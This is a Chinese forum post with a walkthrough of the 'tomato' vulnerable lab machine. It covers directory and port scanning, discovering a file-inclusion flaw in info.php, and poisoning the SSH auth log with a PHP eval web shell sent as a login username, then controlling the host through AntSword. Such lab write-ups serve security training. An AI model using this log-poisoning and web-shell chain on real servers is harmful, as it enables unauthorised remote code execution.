首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
SAAS
ToB门户
了解全球最新的ToB事件
论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
微博
Follow
记录
Doing
博客
Blog
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
排行榜
Ranklist
相册
Album
应用中心
qidao123.com ToB IT社区-企服评测·应用市场
»
论坛
›
安全
›
数据安全
›
tomato-靶机渗透
返回列表
发新帖
tomato-靶机渗透
[复制链接]
发表于 2024-9-28 21:26:41
|
显示全部楼层
|
阅读模式
tomato-靶机
一、安装靶机环境
下载双击.ova文件,写文件名路径导入
打开假造机用NAT模式
编辑–>假造网络编辑器查看IP段
二、信息收集
1.御剑端口扫描查找该假造机的IP
访问网站
扫目次
dirb http://192.168.30.130
复制
代码
收集到目次
/server-status
/antibot_image/
/index.html
复制
代码
访问/antibot_image目次
在目次下找到info.php
查到
根目录:/var/www/html
用户名:webmaster@localhost
复制
代码
查看info.php源代码,提示image参数用于文件包含
三、毛病渗透
写image参数=linux的系统文件,发现乐成表现,确定有文件包含毛病
2.发现端口没有全部扫描出来,利用这个命令扫描
nmap -A 192.168.30.130 -p-
复制代码
2211是ssl的毗连端口
ssh '<?php @eval($_POST['cmd']);?>'@192.168.30.130 -p 2211
复制代码
然后在网页端查看ubuntu报错信息:/var/log/auth.log
http://192.168.30.130/antibot_image/antibots/info.php?image=/var/log/auth.log
复制代码
看到注入乐成,然后用蚁剑
URL地址
http://192.168.30.130/antibot_image/antibots/info.php?image=/var/log/auth.log
复制代码
然后就可以控制整个文件
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
×
回复
使用道具
举报
返回列表
玛卡巴卡的卡巴卡玛
+ 我要发帖
登录后关闭弹窗
登录参与点评抽奖 加入IT实名职场社区
去登录
微信订阅号
微信服务号
微信客服(加群)
H5
小程序
快速回复
返回顶部
返回列表